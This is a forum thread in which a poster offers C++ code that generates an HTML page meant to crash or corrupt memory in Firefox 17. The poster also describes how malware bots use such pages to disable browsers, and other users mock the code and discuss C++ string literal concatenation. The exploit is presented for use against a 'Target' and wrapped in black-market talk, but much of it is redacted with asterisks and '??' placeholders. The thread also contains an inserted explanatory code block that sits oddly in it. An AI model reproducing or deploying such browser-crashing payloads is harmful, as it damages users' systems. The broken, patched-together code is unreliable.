[0day] Browser Exploit [CODE] Using C++ for this

closed account (ozUkoG1T)
Hi,

I have translated an HTML script into C++ code which allows the attacker to simply create a memory corruption on Morzilla Firefox Version 17.0. These types of attacks are not very effective, but they are interesting: when these exploits are triggered they create local issues, such as Morzilla Firefox behaving in a different way, loss of saved passwords, or even the browser becoming useless for any purpose. This exploit was not discovered by me, but I have translated it into C++. This is a direct snippet out of my project, a Pentesting Toolkit. It has been tested on Linux SUSE Enterprise v.11. Such exploits can again be sold on the black market for around $40,000, but since it has been reported by the original creator[s] to Morzilla it is not worth anything anymore, considering Morzilla will probably try to patch it up.

These scripts can be used in bots to make a crash of a browser look legitimate. Some browsers have protections; for example, on Windows most of the top-level browsers such as Google Chrome may have a layer of protection, but to make sure those protections are avoided and the browser is still successfully killed, they use these scripts. This allows these bots to make sure the malware is damaging the interior of the program rather than the outer, so that the browser will be rendered useless.

CODE:

#include<iostream>
#include<fstream>
using namespace std;
int main()
{
	ofstream ExploitFile; 
	ExploitFile.open("Crash.html");
	ExploitFile<<"<html>"<<endl;
	ExploitFile<<"<head>"<<endl;
	ExploitFile<<"<title>Memory Corruption -Proof-Of-Conecpt</title>"<<endl;
	ExploitFile<<"<**** onload=\"""**********:KedAns();""\">"<<endl;
	ExploitFile<<"<script ********=\"""**********""\""<<">"<<endl;
	ExploitFile<<"function KedAns()"<<endl;
	ExploitFile<<"{"<<endl;
	ExploitFile<<"var puf =unescape(\"""??""\");"<<endl; // This is the payload for our Memory Corruption.
	ExploitFile<<"puf+=unescape(\"""??""\");"<<endl;
	ExploitFile<<"puf+=unescape(\"""??""\");"<<endl;
	ExploitFile<<"puf+=unescape(\"""??""\");"<<endl;
	ExploitFile<<"puf+=unescape(\"""??""\");"<<endl;
	ExploitFile<<"puf+=unescape(\"""??""\");"<<endl;
	ExploitFile<<"puf+=unescape(\"""??""\");"<<endl;
	ExploitFile<<"puf+=unescape(\"""??""\");"<<endl;
	ExploitFile<<"puf+=unescape(\"""??""\");"<<endl;
	ExploitFile<<"puf+=unescape(\"""??""\");"<<endl;
	ExploitFile<<"puf+=unescape(\"""??""\");"<<endl;
	ExploitFile<<"puf+=unescape(\"""??""\");"<<endl;
	ExploitFile<<"puf+=unescape(\"""??""\");"<<endl;
	ExploitFile<<"puf+=unescape(\"""??""\");"<<endl;
	ExploitFile<<"puf+=unescape(\"""??""\");"<<endl;
	ExploitFile<<"puf+=unescape(\"""??""\");"<<endl;
	ExploitFile<<"********.write(puf);"<<endl;
	ExploitFile<<"var buffer = '\x41\x42\x43'"<<endl;
	ExploitFile<<"for(i=0; i <= 999 ; ++i)"<<endl;
	ExploitFile<<"{"<<endl;
	ExploitFile<<"buffer+=buffer+buffer"<<endl;
	ExploitFile<<"********.write(buffer);"<<endl;
	ExploitFile<<"}"<<endl;
	ExploitFile<<"}"<<endl;
	ExploitFile<<"</script>"<<endl;
	ExploitFile<<"</head>"<<endl;
	ExploitFile<<"</****>"<<endl;
	ExploitFile<<"</html>"<<endl;  // The exploit file is ready for duty. Let me just close this file.

	ExploitFile.close(); // File is successfully closed and ready for action.

	cout<<"Exploited File is ready to be executed by Target! Good Luck\n";
	cin.get();
	return 0;
}


Please use it responsibly; I am not responsible for any damage you cause. This shows internet browsers are prone to destruction as well, not just AV. Some bots do this so that the user cannot use that browser, due to reasons such as plugins and such.

Learn From this!
Uhm... Besides being malicious HTML... Nothing says a browser cannot keep track of every allocation and make sure on page unload all that memory gets released...
Also this is plain write-to-file code; it has very little to do with:
1. The section (Unix? What?)
2. C++ (C++? Seriously? This is like copy-pasting some lines of text, why such a waste of memory, ideas and everything?)

Also: unescape(\"""??""\")
I hope you realize this code won't even compile.

Also making sure you know it wasn't me who reported.
closed account (ozUkoG1T)
No, the reason this is in the Unix\Linux section is that this code has been tested on Linux.

Also, the code does compile on Visual C++; I actually did it. I promise.

Also, I believe you, bro. I know you did not report it.
What I mean is, this should be a plain HTML source file and should be put under Lounge...

This isn't directly related to C++.
EssGeEich wrote:
Also: unescape(\"""??""\")
I hope you realize this code won't even compile.


It does compile, but two double quotes inside a literal string expand to nothing. For example:
char test[] = "123""456""";
is the same as:
char test[] = "123456";
Never seen code like that being used anywhere. Anyways probably what he wrote isn't what he meant. Or maybe it is.
Why is he calling it Morzilla?
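As an added illustration of the point made above about adjacent string literals (example code written for this thread, not part of the posted program), the following shows that the `\"""??""\"` form in the posted code and a plainly escaped single literal produce byte-for-byte the same text:

```cpp
#include <cstring>
#include <string>

// Adjacent string literals are joined by the compiler into one array,
// so "123""456""" is exactly the same as "123456" (the empty "" adds nothing).
// Constructed example values, not from the posted program.
const char kSplit[]  = "123""456""";
const char kJoined[] = "123456";

// The form used in the posted code: \"" closes one literal with an escaped
// quote, "??" is a second literal, and "\" opens the third with an escaped
// quote. What reaches the generated file is:  var puf =unescape("??");
std::string postedForm() {
    return "var puf =unescape(\"""??""\");";
}

// The same text written the way most people would: one literal, escaped quotes.
std::string plainForm() {
    return "var puf =unescape(\"??\");";
}

// Count the double-quote characters that actually end up in the text,
// to show the empty literals contribute no characters of their own.
int countQuotes(const std::string& s) {
    int n = 0;
    for (char c : s) {
        if (c == '"') ++n;
    }
    return n;
}

// True when the split and joined spellings are identical arrays.
bool literalsMatch() {
    return sizeof(kSplit) == sizeof(kJoined) && std::strcmp(kSplit, kJoined) == 0;
}
```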
That's even more confusing.

Is that like a fork or something? Is Morzilla different from Mozilla?
That doesn't help.
@mordoran That's because the quotes aren't inside the string literal, they're actually separating different string literals. However, in C/C++, consecutive string literals like that are concatenated.
@EssGeEich It's not C++, it's inside a C++ string literal...
closed account (ozUkoG1T)
I meant Mozilla and NOT MORZILLA, SORRY guys
:'D
Also I believe you bro. I know you did not report it.

Hmm... so does that mean you know who did, bro?